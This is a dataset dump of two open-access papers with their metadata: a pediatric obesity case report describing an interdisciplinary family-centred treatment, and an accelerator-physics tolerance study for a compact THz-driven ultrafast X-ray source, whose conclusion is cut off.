id stringlengths 3 9 | source stringclasses 1 value | version stringclasses 1 value | text stringlengths 1.54k 298k | added stringdate 1993-11-25 05:05:38 2024-09-20 15:30:25 | created stringdate 1-01-01 00:00:00 2024-07-31 00:00:00 | metadata dict |
|---|---|---|---|---|---|---|
11724356 | pes2o/s2orc | v3-fos-license | An interdisciplinary, family-centered approach to treating pediatric obesity in an 11-year-old female: a case report
Pediatric obesity has become increasingly prevalent over the past 2-3 decades. Recently-published clinical practice guidelines and expert recommendations provide guidance for obesity treatment, but therapy is often complicated by a host of medical, behavioural, psychosocial, and interpersonal issues. We report the case of an 11-year-old obese girl and her family referred for weight management. Our case underscores the need for an interdisciplinary, family-centered approach to the assessment and treatment of pediatric obesity, and highlights the value of understanding familial complexities that often accompany this health issue. The importance of utilizing multiple health indicators to assess weight management ‘success’ is discussed.
Introduction
Given the high prevalence of obesity and its concomitant health risks, clinicians have an important therapeutic role to play in helping obese children and their families optimize weight-related cognitions and behaviors. The recent publication of clinical practice guidelines and expert recommendations offer clinicians evidence-based guidance for the treatment of pediatric obesity [1,2]. Building on this evidence, and based on our team's clinical experience, we believe there are two central issues that should guide how these recommendations are implemented. First, there is a critical need for an interdisciplinary team assessment at presentation to determine families' medical, behavioral, psychosocial, and interpersonal issues. Although an interdisciplinary assessment has been encouraged [1,2], the interplay between medical, behavioural, and psychosocial assessments have not been outlined in detail and examples of tools and procedures for use in the clinical setting have not been specified. Second, to identify families' capabilities and readiness to make and maintain positive changes, a thorough exploration and understanding of familial complexities is needed for clinicians to help families achieve weight management success. Framed by these two issues, the case below highlights our team's approach in the context of one family.
Case presentation
An 11-year-old Caucasian (Canadian) obese girl was referred for weight management with her family. Prior to beginning treatment, the family underwent medical, behavioural, and psychosocial assessments by a pediatrician, nurse, dietitian, exercise specialist, and psychologist. The patient's BMI at intake was 29.9 kg/m 2 (age-and sexspecific BMI >98 th percentile). She also had a high waist circumference (>95 th percentile). Several obesity-related co-morbidities were identified including mildly elevated blood pressure (>90 th percentile), elevated total and LDL cholesterol (75 th and 90 th percentiles, respectively), and low HDL cholesterol (10 th percentile) ( Table 1). While fasting glucose was normal, insulin was elevated; acanthosis nigricans, a marker of insulin resistance, was observed at the neck. Family medical history indicated obesity, hyperlipidemia, and hypertension in both maternal and paternal families ( Figure 1). A comprehensive lifestyle behavior assessment, which included a 4-day food record, pedometer log, and physical activity record, was completed. Compared to other obese children enrolled in our weight management center [3], vegetable and fruit intake and physical activity were relatively healthy, but records highlighted several opportunities to make healthier choices, especially regarding intake of high sugar/high fat foods and sedentary activity.
The patient's psychosocial history indicated difficulties with social skills including struggles to develop and maintain friendships; she was accused of bullying repeatedly during the past school year. She reported a preoccupation with her body and appearance, poor selfesteem, and being sensitive to social rejection. Data from the Child Behavior Checklist [4] indicated that her symptoms were within the 'clinical range' for social problems, internalizing problems, and total problems; scores fell in the 'borderline range' for anxiety and depression. Scores on the Parenting Stress Index (PSI) [5], a measure of situational stressors, indicated that the mother found her daughter's demandingness and mood stressful, and that she failed to meet parental expectations for attractiveness and pleasantness. A family social assessment indicated a history of instability in the past year ( Figure 1). The patient's parents had unexpectedly separated and paternal visitation was sporadic. New additions to family structure occurred (i.e., parental separation, new parental partners, birth of sibling), and there were several family relocations. Throughout her parents' relationship, the patient assumed a parentified role in the family and was struggling to adapt to role changes with the addition of new parental figures. The life stress score on the PSI was elevated. Family functioning, as measured by the Family Adaptability and Cohesion Evaluation Scales [6], indicated relatively healthy 1 Includes high energy-dense foods that are high in sugar and/or fat and low in nutrients. 2 Time to exhaustion on a treadmill walking test using a modified Balke protocol. 3 Change is positive from 'low' to 'moderate' score. 4 Change is positive from 'low-balanced' to 'average-balanced'. levels of family cohesion and flexibility, but the mother reported dissatisfaction with the family system and the family's communication patterns. Following these assessments, a team case conference, and discussion with the family, all agreed on the family's need and readiness for weight management.
Subsequently, the patient's mother and partner enrolled in a 16-week, group-based weight management intervention. This evidence-based program was consistent with current pediatric obesity treatment recommendations and included working with parents as agents of change on behalf of the family. Lifestyle changes were contextualized within the family system, an approach that can be more effective than working with children exclusively or parents and children together [7,8]. The intervention focused on helping the patient's mother and partner to set nutrition, physical activity, communication, and relationship goals that built on family strengths and enhanced areas (identified by the family) that needed improvement. The patient's mother and partner attended 15/16 sessions. During this time, the patient attended six adjuvant individual psychotherapy sessions that focused on coping with difficult peer situations and depressed mood.
At the end of the intervention, the patient's BMI and BMI percentile decreased slightly, but she was still classified as obese (Table 1). Improvements in several metabolic risk factors were also noted. Lifestyle behaviour assessments indicated increased vegetable and fruit intake, decreased intake of high sugar/high fat foods, and reduced screen time. While steps/day decreased, the patient improved her time on the treadmill test by >5 minutes indicating an improved level of cardiorespiratory fitness. The patient's depressive symptoms improved and all subscales of the Child Behavior Checklist improved to within the 'normal range'. Her mother reported a more positive view of her daughter and found her behaviour less stressful. While life stress for the family remained the same, family communication, satisfaction, and family cohesion and flexibility all improved following the intervention (Table 1).
Discussion
Our clinical assessments in this case included an examination of physical, behavioural, psychosocial, and interpersonal issues. This detailed evaluation assisted us, both clinicians and the family, in identifying health improvements over the course of treatment. It is worth noting that the traditional measurements (Table 1) often taken to evaluate pediatric obesity treatment success may foster a pessimistic view of the family's intervention since only modest anthropometric changes were noted. However, in the absence of intensive therapy (i.e., bariatric surgery), it can take an extended period for a patient's weight status to improve substantially. As an initial goal, one of the key recommendations in pediatric weight management is to achieve weight maintenance, followed by weight loss if warranted. A singular focus on weight loss to gauge treatment success may undermine many other healthy family changes; this supports the extensive measurements we completed provided a comprehensive view of the physiological, lifestyle, and family-related changes. These measures also gave us the opportunity to highlight areas of strength within the family to help encourage them to make further lifestyle changes. By emphasizing the family's positive changes (i.e., reductions in blood pressure and cholesterol, increased dietary quality and cardiorespiratory fitness, and improved family dynamics), the family was able to identify meaningful health improvements and was motivated to continue making changes. While the procedures required to collect this information can be labor-intensive for clinicians and time-consuming for families, these data provide relevant information upon which families can establish specific and tailored treatment goals. In addition, families are able to base their goals on objective data that serve as clinically-meaningful benchmarks.
Our interdisciplinary, integrated approach enabled our team to help this family to develop strategies during the intervention for family-wide changes. Parents were encouraged to understand how their busy schedules and family disruptions impacted lifestyle behaviour goals, and how they could work together as a parenting unit to make changes while being mindful of potential roadblocks. Although this family was attempting to manage many stressors, they also had several strengths. The mother and her partner were highly motivated and were willing to work together to make lifestyle changes for the family rather than just helping their daughter to make changes on her own. The contextual information we derived from clinical interviews with the family, combined with valid and reliable psychosocial and family-related questionnaires [4][5][6], enabled us to form a comprehensive perspective of this family. This case demonstrates that lifestyle changes are made within the context of family functioning, and that clinicians must be mindful of family complexity, schedules, and norms when making recommendations. For example, if immediate lifestyle behavioural changes prove to be particularly challenging and the psychosocial / familial assessment determines a family is under a high level of stress or dealing with tumultuous personal problems, modest treatment goals or deferral of treatment should be discussed with families. Family complexity does not necessarily limit a family's ability to make changes. If a family has a high level of awareness and has the ability to manage their stressors, treatment should be initiated.
Conclusion
Lifestyle changes occur for obese children within the context of their families. An integrated interdisciplinary assessment of the family environment and functioning, one that augments traditional weight management metrics, is necessary to make evidence-based (and practical) recommendations. The degree of family complexity, along with their strengths and barriers to change, must also be taken into account. It is necessary to assess a number of health indicators that are relevant to pediatric obesity, not only to identify co-morbid conditions, but to identify areas of improvement as a way of optimizing family motivation. Often, once improvements are made in psychosocial or interpersonal domains, new opportunities emerge for families to make healthier nutrition and physical activity choices. We submit that in lieu of a traditional, reductionistic approach that focuses exclusively on weight loss as the indicator of success, pediatric obesity should be conceptualized as a complex issue that requires an interdisciplinary, integrated, and evidencebased response that includes weight loss as one of several important treatment outcomes. We believe delivering obesity treatment services in this manner will also be beneficial for clinicians who often experience frustration and feel ineffectual when traditional indicators of weight management success are not achieved.
Abbreviations
None. | 2016-05-12T22:15:10.714Z | 2009-06-03T00:00:00.000 | {
"year": 2009,
"sha1": "b5c5b4cbc736d84289072b0e40b991c5e48ca847",
"oa_license": "CCBY",
"oa_url": "https://casesjournal.biomedcentral.com/track/pdf/10.1186/1757-1626-2-6677",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "b5c5b4cbc736d84289072b0e40b991c5e48ca847",
"s2fieldsofstudy": [
"Medicine",
"Psychology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
236856661 | pes2o/s2orc | v3-fos-license | Challenges and tolerances for a compact and hybrid ultrafast X-ray pulse source based on RF and THz technologies
We present an in-depth tolerance study and investigation of the main challenges towards the realization of a hybrid compact ultrafast (fs to sub-fs) X-ray pulse source based on the combination of a conventional S-band gun as electron source and a THz-driven dielectric-loaded waveguide as post-acceleration and compression structure. This study allows us determining which bunch properties are the most affected, and in which proportion, for variations of the parameters of all the beamline elements compared to their nominal values. This leads to a definition of tolerances for the misalignments of the elements and the jitter of their parameters, which are compared to the state-of-the-art in terms of alignment precision and stability of operation parameters. The most challenging aspects towards the realization of the proposed source, including THz generation and manufacturing of the dielectric-loaded waveguide, are finally summarized and discussed.
Introduction
Particle acceleration beyond the few-MeV level currently requires large infrastructures, of the order of several meters or tens of meters, due to the low operating frequencies (a few GHz) and field amplitudes (a few tens of MV/m in the meter-long structures) of the conventional RF accelerating structures. The same remark holds for the schemes used to compress electron bunches down to durations of the single femtosecond order or below. This is indeed typically done via velocity bunching [1], requiring several meters long accelerating structures and/or drift space, or in magnetic chicanes, which length depends on bunch energy but is typically a few meters.
One of the schemes currently investigated to overcome these limitations, and achieve compact accelerators delivering pC-level ultrashort (fs to sub-fs duration) electron bunches with an energy above the MeV-level, is to use dielectric-loaded structures driven by laser-generated THz 1 pulses [2][3][4][5]. In these structures, the frequencies (100 GHz to 10 THz) and field amplitudes (up to a few GV/m) are expected to be much higher than in conventional RF structures. This would allow bunch acceleration and compression by velocity bunching within a few tens of cm, thus reducing the footprint of accelerator beamlines.
One of the first potential applications of THz-driven accelerating structures is to build a compact ultrafast X-ray source based on Inverse Compton Scattering (ICS) [6], delivering fs to sub-fs pulses. However, due to the high frequency, high field amplitude and reduced transverse dimension of THzdriven structures, tolerances to jitters and beamline imperfections are expected to be tight and to represent one of the main challenges towards such compact X-ray sources. In this paper, we present an 1 In this paper, we consider the THz range of frequency as being between 100 GHz and 10 THz. in-depth tolerance study (Section 2) and investigation of the main challenges (Section 3) for the realization of a concept of hybrid and compact ultrafast (fs to sub-fs) X-ray pulse source based on ICS previously investigated by the authors [7,8] within the context of the AXSIS project [9]. The tolerance study aims to define the acceptable margins for several beamline imperfections and various experimental jitters, thus determining which of them are the most challenging to be met.
A schematic layout of the concept of ultrafast X-ray pulse source considered in this paper is shown in Figure 1 (top). The electron source is a conventional laser-driven 1.6 cell S-band RF-gun operating at 2.9985 GHz with its peak field amplitude fixed at 140 MV/m, corresponding to the maximal gradient experimentally achieved with a BNL/SLAC/UCLA gun [10,11]. A solenoid electromagnet is then used to focus the beam for injection into a THz linac, consisting in a partially dielectric-loaded circular waveguide (DLW) (see Figure 1 bottom) driven by a multicycle THz pulse exciting the TM 01 mode [12,13]. In the THz linac, the electron bunch is simultaneously accelerated up to 15-20 MeV and compressed down to duration on the single femtosecond order or below. The beam exiting the THz linac is finally focused by a triplet of quadrupole electro-magnets to the ICS point, where it interacts with an infrared laser to generate X-rays through ICS. More details on the beam dynamics and on the optimization of the layout presented in Figure 1 are available in [7,8]. As reference case for the tolerance study, we use typical electron bunch properties at the ICS point simulated with ASTRA [14] for a 1 pC charge. They are presented in Table 1, with the following symbols being used throughout the paper to denote the electron bunch properties: Q (charge), <E> (average kinetic energy), σ E (rms energy spread), σ t (rms length), σ x -σ y (rms transverse horizontalvertical size) and ε x -ε y (rms normalized transverse horizontal-vertical emittance). The values in Table 1 are simulated with the following reference beamline parameters: • Gun region: Peak field E mg = 140 MV/m; UV laser rms duration σ t,UV = 75 fs (Gaussian profile) and transverse size σ r,UV = 0.5 mm (Gaussian profile cut at 1σ); Solenoid peak field B 0 = 0.258T. • THz linac: THz pulse central frequency f = 300 GHz; Field amplitude E ml = 115 MV/m. The tolerance study is divided and conducted separately into the four main sections of the layout shown in Figure 1, namely the RF-gun region (RF-gun, UV laser and solenoid), the THz linac, the quadrupole triplet and the ICS interaction region. In this way, the conclusions drawn from the study are not limited to the specific layout shown in Figure 1, but can also be of interest for other applications implying THz-driven DLWs, especially applications relying on injection from a conventional RF-gun into such a DLW.
Tolerance study
Different approaches have been used to perform the tolerance study.
For a single and constant beamline imperfection, for example a misalignment, a simple parameter scan has been performed with ASTRA to determine the tolerances. In case jitters of beamline parameters are involved, the relevant quantities to determine the tolerances are the distribution and partition functions of the electron bunch properties at the ICS point under the assumed jitters.
To study a single jitter of a beamline parameter, the procedure is to first run a scan with ASTRA where the parameter is varied step-by-step within a range covering the jitter window. The beam properties at the ICS point are recorded for each step. For each beam properties, the obtained values are then fitted with Matlab to obtain continuous curves over the parameter variation range. Finally, a jitter following a Gaussian distribution with a standard deviation σ jit respective to the parameter nominal value is simulated with Matlab. A large number of values (of the order of 10 6 ) of the jittering parameter are randomly generated following a Gaussian distribution (with a cut-off at ± 3σ jit ). For each values, the beam properties are determined using the curves previously obtained with Matlab and recorded. This delivers histograms of the beam properties at the ICS point. Normalizing these histograms, such that their integrals become equal to 1, leads to the distribution functions of the beam properties. An integration of the distribution functions leads to the partition functions of the beam properties.
To study the simultaneous influence of several beamline imperfections and/or parameter jitters, we use the ERROR namelist of ASTRA [14]. This namelist allows running ASTRA for a given number of iterations, while at each iteration a user-defined list of parameters is randomly varied following Gaussian distributions (the standard deviations σ jit of the distributions are user-defined for all the parameters) with a user-defined cut-off (± 3σ jit in our case). Histograms of the beam properties at the ICS point are obtained in this way, and subsequently their distribution and partition functions are computed as explained above. This method is consuming in terms of computing time. This explains why simpler and faster methods are used when only a single beamline imperfection or parameter jitter is studied.
Throughout Section 2, the relative variation of the electron bunch properties displayed are relative to the reference case shown in Table 1.
A last important point is that the reference case of Table 1 used for the tolerance study is simulated assuming a THz linac with f = 300 GHz. One should note that the higher f, the tighter the tolerances are. Therefore, for cases with f < 300 GHz, the tolerances would be relaxed, by a factor close to the frequency ratio, compared to what is derived in the present section for 300 GHz.
RF-gun region
For the RF-gun region, from the cathode to the THz linac entrance, the influence of jitters of the following parameters on the electron bunch properties at the ICS point are studied: RF-gun field amplitude, dephasing between the UV laser driving the gun and the RF-field, UV laser pulse energy, UV laser pointing and solenoid peak field.
We first study these jitters altogether, because their combination drives two important jitter sources: the arrival timing jitter and pointing jitter of the electron bunch at the THz linac entrance. Table 2 shows the rms values we assumed for the Gaussian distributions of the jitters in ASTRA. We found σ E and σ t to be the most affected properties under the assumed jitters (see Figures 2 (a) and (b)). This was expected since the studied jitters induce a significant bunch arrival timing jitter at the THz linac entrance and thus of the bunch injection phase into it, to which σ E and σ t are very sensitive. Table 2. Variation of σ E (c) and σ t (d) at the ICS point as a function of the detuning of the individual parameters shown in Table 2 compared to their nominal values. The nominal bunch properties are given in Table 1.
The values assumed in Table 2 for the jitters are still not fully satisfactory. In fact, for example, 20% of the shots present a variation of σ E greater than +25% (see Figure 2 (a)). To determine which of the jittering parameters of Table 2 has the strongest influence, we decoupled them and studied the variation of σ E and σ t as a function of the single parameters detuning, expressed in units of the rms values shown in Table 2. This is shown on Figures 2 (c) and (d), which first show that the influence of the parameters detuning is not identical on σ E and σ t . Indeed, the strongest variations come for opposite parameters detuning (positive detuning for σ E and negative detuning for σ t ). For the opposite directions, the variations remain more limited. Figures 2 (c) and (d) then show that, for both σ E and σ t , the strongest influences are from the RF-gun phase and field amplitude jitters. The values assumed in Table 2 for these jitters are at the current state-of-the-art, and even slightly below for the phase [15][16][17][18][19]. To significantly improve the stability of σ E and σ t at the ICS point would therefore require improving the RF-gun phase and field amplitude stability beyond the current state-of-the-art and is therefore challenging. Figure 2 (c) also shows that between +1 and +6 units, the contribution of a UV laser pulse energy detuning to the variation of σ E is around one half (third) of the RF-gun field amplitude (phase) contribution. A small gain could therefore be obtained by reducing its jitter, which is feasible according to the current state-of-the-art of laser intensity stability [20].
THz linac region
For the THz linac, we first study the field amplitude and phase jitters. The phase jitter represents here only the contribution of the internal phase jitter of the THz pulse source, and does not include the contribution of the electron bunch arrival timing jitter at the THz linac entrance. We then study the influence of THz linac misalignments: translation along x, y and z and rotation around x and y (see Figure 1 for definition).
THz linac field amplitude and phase jitters.
Regarding the THz linac field amplitude, our simulations show that a jitter mostly affects <E>, σ E , σ x and σ y . A 1% rms jitter would provide a stability of the electron bunch properties already reasonable for operation. In fact, Figure 3 (a) shows that, for the most affected property σ y , 90% of the shots then exhibit a variation lower than 10%. It also shows that it deteriorates rapidly. Indeed, for a 3% rms jitter, 30% of the shots vary by more than 30%.
Regarding the THz linac phase, a jitter mostly affects <E>, σ E and σ t . It has to be significantly below 1° rms (≡ 10 fs at 300 GHz) for reasonably stable operation. In fact Figure 3 (b) shows that if this is not the case, for the most affected property σ E , 20% of the shots will then exhibit a variation greater than +35% and potentially up to +120%. Figure 3 (b) shows that this percentage falls to zero for a jitter below around 0.33° rms (≡ 3 fs at 300 GHz).
A more detailed study on the influence of these two jitters is available in [8]. As explained later in Section 3.1, a promising option to fulfil the requirements in terms of THz pulse power and duration is the laser-based THz generation. The achievable stability for the THz linac field amplitude and phase in this case directly results from the stability of the source laser for the THz pulse driving the THz linac. A 1% rms energy jitter and even below is already achievable as the current state-of-the-art of Joule-class lasers [21], and would be compatible with the tolerances aforementioned. The aspect of the phase stability remains to be investigated. Table 1.
THz linac misalignments.
The THz linac translation respective to its nominal position has been studied up to +/-0.6 mm along x and y and up to +/-1 mm along z. Its rotation respective to its nominal position around the x and y axis has been studied up to 9 mrad (≈ 0.52°) with respect to the THz linac entrance and up to 13 mrad (≈ 0.75°) with respect to the THz linac center. Figure 4 shows . Variation of σ E and σ t at the ICS point as a function of a THz linac transverse offset along y (c) and rotation around y with respect to its center (d). Variation of σ x and ε x (resp. σ y and ε y ) at the ICS point as a function of a THz linac rotation around x (e) (resp. y (f)) with respect to its entrance. The nominal bunch properties are given in Table 1. Figures 4 (a) and (b) show that the charge losses start to become significant when the THz linac transverse offset (resp. rotation) exceeds 200 μm (resp. 3 mrad (≈ 0.17°)). A 200 μm transverse offset starts to be reasonable for the electron bunch properties, the most affected (σ E ) varying by +20% (for an offset along y) as shown in Figure 4 (c). Conversely, a 3 mrad THz linac rotation is too big. In fact, as shown in Figures 4 (d), (e) and (f), the variations of σ E , σ t , σ x , ε x , σ y and ε y could then respectively exceed +75%, +250%, +50%, +65%, +100% and +140%. To keep under +20% these variations requires a rotation below 1 mrad (≈ 0.06°) for σ x , σ y , ε x and ε y , and below 0.5 mrad (≈ 0.03°) for σ E and σ t . The asymmetry in the bunch properties variations with THz linac translation (rotation) along (around) x or y, although the THz linac and its field are cylindrically symmetric, comes from the asymmetric transverse focusing provided by the quadrupole triplet downstream.
The 200 μm and 1 mrad (0.5 mrad) tolerances on the THz linac transverse offset and rotation are well within what is achievable with commercially available precision positioning devices like hexapods, which can be on the 10 nm and 1 μrad levels for the absolute position. However, the THz linac alignment will in practice be relative to the other beamline elements. Its practical precision will therefore be ultimately defined by a beam-based alignment procedure, which precision is to be investigated and very likely to be worse than the one of the positioning device.
Quadrupole triplet region
For the quadrupole triplet, we study the influence of a quadrupole gradients jitter and of quadrupoles misalignments: translations along x, y and z and rotations around x, y and z (see Figure 1 for definition).
Quadrupole gradient jitter.
A detuning of the gradients is studied, first independently for the three quadrupoles, in a range of +/-2% around the nominal gradients. Only the bunch transverse size, especially σ y , is found to be significantly affected by a quadrupole gradient detuning, especially of the 2 nd quadrupole, for the studied range (see Figures 5 (a) and (b)). However, the variations of σ x and σ y become significant only for large quadrupole gradients detuning (typically > 0.5%), much larger than the stability achievable in practice. In fact, commercially available magnet power supplies can deliver a current stability at the 10 ppm level.
Even in the case where the three quadrupoles all have a high uncorrelated 0.5% rms gradient jitter, the variation of σ x remains below 10% (see Figure 5 (c)) and less than 10% of the shots exhibit for σ y a variation higher than +20% (see Figure 5 (d)). The quadrupole triplet gradients stability is therefore not expected to represent a challenge for the investigated X-ray pulse source concept. Table 1.
Quadrupole misalignments.
The misalignments are studied independently for the three quadrupoles. The translations respective to their nominal positions are studied up to +/-0.5 mm along x and y and up to +/-1 mm along z. The rotations respective to their nominal positions are studied up to 20 mrad (≈ 1.15˚) around x, y and z. Figure 6 shows the properties and cases for which the tolerances are the tightest.
A translation along y of the 3 rd and especially 2 nd quadrupole mostly affects σ E and σ t (see Figures 6 (a) and (b)) and also, in a less extent, σ y and ε y . The asymmetry between the two transverse directions x and y is due to the asymmetric transverse focusing provided by the quadrupole triplet, where the electron bunch is first defocused in the y direction before being strongly focused. With a quadrupoles alignment around or better than 30 μm in the y direction, already demonstrated [22,23], the variations of σ E and σ t would be kept below +8% according to Figures 6 (a) and (b).
The only quadrupole rotation found to have a significant influence on the bunch properties, for the studied range, is the one around z. A rotation around z of the 1 st (resp. 2 nd ) quadrupole especially affects σ y and ε y (resp. σ x and ε x ) as shown in Figures 6 (d) and (c). However, this influence will remain limited in practical conditions. Indeed, even with a rotation of 0.5° (9 mrad), much worse than what is currently achievable with a mechanical alignment, the variations of σ x,y and ε x,y will remain below +20% according to Figures 6 (c) and (d). Figure 6. Variation of σ E (a) and σ t (b) at the ICS point as a function of quadrupoles translations along y. Variation of σ x (c) and ε y (d) at the ICS point as a function of quadrupoles rotations around z. The nominal bunch properties are given in Table 1.
ICS region
The achievable X-ray pulse properties with the layout shown in Table 1 have been investigated through simulations (see [8] for details), showing its potential tunability between 2.9 and 11.5 keV with, for 400 mJ laser energy, 1.5*10 4 to 7.7*10 4 photons/pulse in 1.5% rms bandwidth. In this section, we study the influence of a misalignment between the electron bunch and the laser driving the ICS process both in time and transversely, as well as the influence of a mismatch (without misalignment) between the electron bunch and laser transverse sizes at focus. In addition to the number of photons after collimation N γ,θcoll , we use the spectral photon density (SPD), defined as the ratio between the number of photons and their rms bandwidth [24], as the figure of merit to be maximized for the X-ray pulse quality.
N γ,θcoll scales like the inverse of the bunch transverse size squared [24] and the photon pulse bandwidth especially depends, among other contributions, on the bunch transverse size and energy spread [25]. To have a deeper insight into the tolerances for the ICS region, we therefore study four cases corresponding to four different sets of electron bunch properties, with different transverse sizes and energy spreads. Case 1 is the reference shown in Table 1 and Case 2 is the same with the rms transverse size artificially reduced to 6*6 μm 2 . These two cases have a relatively large (0.7% rms) energy spread. Case 3 has been simulated with different beamline parameters and has the following properties: <E> = 16.33 MeV, σ E = 23.8 keV, σ t = 3.42 fs, σ x /σ y = 10.0/9.1 μm and ε x /ε y = 0.212/0.195 π.mm.mrad, and Case 4 is the same with the rms transverse size artificially reduced to 6*6 μm 2 . These two cases have a relatively low (0.15% rms) energy spread (but longer length).
For the laser, we assume a wavelength of 1048 nm, 400 mJ pulse energy, a duration σ t,L = 1 ps rms (Gaussian) and a round Gaussian transverse profile with an rms value σ r,L fixed to the average of σ x and σ y of the electron bunch (except when a transverse size mismatch is considered). Figures 7 (a) to (f) show the relative variation of N γ,θcoll and SPD for the four cases as a function of the transverse and time offset between the bunch and the laser, and as a function of the transverse size mismatch between them (the laser transverse size being varied). It also shows (Figure 7 (g)) the distribution and partition functions of the bunch transverse offset at the ICS point, coming from a simulation of Case 1 where all the jitters previously mentioned and assumed in the paper are included. Table 2; THz linac: 1% (field amplitude) and 1° (phase) rms; Quadrupoles gradients: 0.5% rms. Figures 7 (a) and (b) show that N γ,θcoll and SPD decrease in a similar way whatever the case, and that the transverse offset between the laser and the bunch should be below 1 unit of σ r,L to keep their decrease below -20%. As visible in Figure 7 (g), where Case 1 is considered, this is the case under the jitters assumed in the paper, since the offset is below 5 μm (0.47σ r,L ) for all the shots and the rms value of the distribution function is 1.8 μm (0.17σ r,L ).
Figures 7 (e) and (f) show that the cases with bigger transverse sizes (1 and 3) are the ones having the slower decrease of N γ,θcoll and SPD when the time offset between the laser and the bunch increases. This is due to the decrease of the electron bunch and laser divergences in the vicinity of their focal point when their spot sizes increase. This means that they remain close to their focal sizes in a wider spatial range around their focal points, making N γ,θcoll and SPD less sensitive to the time synchronization between them. For all cases, the time offset is reasonable if it remains below a few units of σ t,L (typically 2 times to avoid a decrease of N γ,θcoll and SPD greater than 15%). This means that the synchronization between the bunch and the laser only has to be better than a few ps, which is already demonstrated as achievable (see for example [26]). Figure 7 (c) shows that for all the cases N γ,θcoll decreases in the same way when the laser becomes larger than the bunch. It is increasing for some time (before decreasing) when the laser becomes smaller than the bunch, but in a different way according to the case. The cases with larger transverse sizes (1 and 3) show a greater increase (up to +45% versus up to +25%) and with the maximum being for a smaller laser size (σ r,L reduced by 60% versus by 40%) than the cases with smaller transverse sizes (2 and 4). This is due to the fact that the decrease of the number of electrons interacting with the laser is more compensated for Cases 1 and 3 by the Compton scattering cross-section increase when σ r,L decreases than for Cases 2 and 4. Figure 7 (d) shows that the optimization of σ r,L will be the most challenging for Case 1, namely for bunches with large transverse size and energy spread. Indeed, it is for this case that the variations around the SPD maximum are the sharpest. Besides, the SPD maximum is significantly translated compared to the perfect matching since it appears for σ r,L reduced by 40%, making it harder to find in practice. For Cases 2 to 4, the optimization of σ r,L will be less challenging and important than for Case 1. First, the variations around the SPD maximum are less sharp. Then, the SPD maximum is closer to the perfect matching since the required σ r,L variation remains below 20%. Finally, the gain remains limited since the SPD increase between the perfect matching and σ r,L maximizing it is below 10%. Table 3 gathers the THz pulse properties required to achieve the bunch properties shown in Table 1 and also the ones for f = 150 GHz (instead of 300 GHz). For 150 GHz, DLW transverse dimensions twice as big as for 300 GHz have been assumed, namely a = 1 mm and b = 1.1807 mm.
THz requirements and generation
These properties have been calculated using a model starting from the electromagnetic field analytical expression of the TM 01 mode in the DLW [12,13]. The value of b required to have a phase velocity v ph equal to c is determined by solving the dispersion relation, arising from the boundary conditions. From the dispersion relation, the dispersion curve (frequency as a function of wavelength) is computed, its derivative at f = 300 GHz (150 GHz) giving access to the group velocity v g . From v g , the THz pulse duration required to accelerate the beam over the full DLW length L is calculated. The peak power required to achieve the desired field amplitude is obtained by integration of the complex Poynting vector over a DLW transverse cross-section. Finally, the THz pulse energy is computed by multiplying the peak power by the duration. Detailed information about the equations and procedures used for the derivation of the properties shown in Table 3 are available in [8]. Four main methods are currently used to generate fields in the THz range: gyrotrons [27][28][29], optical rectification of laser pulses in non-linear optical crystals [30][31][32], CSR/FEL radiation generated in accelerators [33][34][35] and beam-driven wakefields (for example in dielectric-loaded structures) [36][37][38]. The methods based on CSR/FEL and beam-driven wakefields require a conventional accelerator with final bunch energy largely above a few MeV, the energy achievable with a conventional RF-gun, and are thus incompatible with a compact X-ray source. However, the beam-driven wakefield is the method coming the closest of the requirements of Table 3, if not fulfilling them, and can thus be useful to perform proof-of-principle experiments. The gyrotrons are currently limited to a few MW peak power, significantly below the requirements, but in long pulses. To use them require to change of approach and not use a travelling wave structure, like the DLW assumed in this paper, but a standing wave structure allowing stocking the THz energy and thus increasing the power (≡ field amplitude) in the structure [39,40]. Up to recently, the laser-based THz generation was limited far below the requirements. Recent experimental results separately demonstrate the generation of multicycle THz pulses fulfilling (or close to fulfil) the requirements on the duration [32] and on the peak power [41], making laser-based THz generation an appealing candidate for our concept. However, several challenges remain. Especially, the combination of duration and peak power into a single pulse and the field amplitude and phase stability of a laser-generated THz pulse (see Section 2.2.1) are still open questions and require research efforts to be addressed.
Manufacturing of the dielectric-loaded waveguide
According to Figure 8 (a), the THz pulse phase velocity in the THz linac v ph is very sensitive to a dielectric thickness variation. In fact, keeping the v ph variation below 1‰ require for the DLW manufacturing a dielectric thickness precision better than 150 nm, which is currently not achievable. However, as visible in Figure 8 (b), v ph also depends on the THz pulse frequency f and an error on the dielectric thickness can be compensated by a change of f (typically 2 GHz/μm). It has been demonstrated experimentally that the THz pulse frequency generated by optical rectification of a laser pulse in a non-linear optical crystal is tuneable by changing the crystal temperature (for example with a cryostat), with a rate around 0.3-0.4 GHz/K [42,43]. The expected error on the DLW dielectric thickness could (and actually would have to) be compensated by adjusting the temperature of the crystal generating the THz pulse. A 1‰ control level on v ph translates into a 1 K control level on the crystal temperature, currently achievable with commercially available cryostats. Table 4 shows how a 1‰ control level on v ph affects the electron bunch properties by comparing those obtained for v ph = 0.999c and 1.001c, after adjustment of the solenoid peak field, THz linac phase and quadrupole gradients, with the reference ones for v ph = c (also shown in Table 1). A decrease to v ph = 0.999c comes with an around 50% increase of σ E and is therefore an issue. However, σ E is preserved (and even slightly decreased) under an increase to v ph = 1.001c. This suggests changing v ph for the reference working point from c (assumed in this paper) to a slightly higher value. It will therefore be interesting for future studies to investigate up to which v ph > c the bunch properties are preserved after proper adjustment of the solenoid peak field, THz linac phase and quadrupole gradients. The objective will be to see if v ph can be sufficiently increased above c to avoid the rapid increase of σ E observed for v ph < c, and also to refine the required level of control on v ph .
Conclusions
We have presented an in-depth tolerance study and investigation of the main challenges towards the realization of a hybrid and compact ultrafast (fs to sub-fs) X-ray pulse source, for which a schematic is shown in Figure 1. These investigations allow defining what the most affected electron bunch For the RF-gun region, the stability of the gun parameters (field amplitude and phase) has to be at the current state-of-the-art and even below to be satisfactory, which represents one of the main challenges. On the other hand, the tolerances for the stability of the UV laser energy and pointing and the solenoid peak field are more relaxed and less challenging.
For the THz linac, a field amplitude stability better than 1% rms is necessary, which is challenging but compatible with the current state-of-the-art of the laser pulse energy stability. The question of the THz source phase stability still needs to be investigated, but will surely be one of the main challenges since it has to be significantly better than 1° (≡ 10 fs at 300 GHz). Another potentially challenging aspect is the THz linac alignment. Its translations and rotations compared to the perfect alignment have to be kept respectively below 200 μm and 1 mrad. While this is well within the current absolute precision of positioning devices, the alignment precision will be ultimately determined by the beambased alignment procedure used to position the THz linac respective to the other beamline elements, and might therefore be worse.
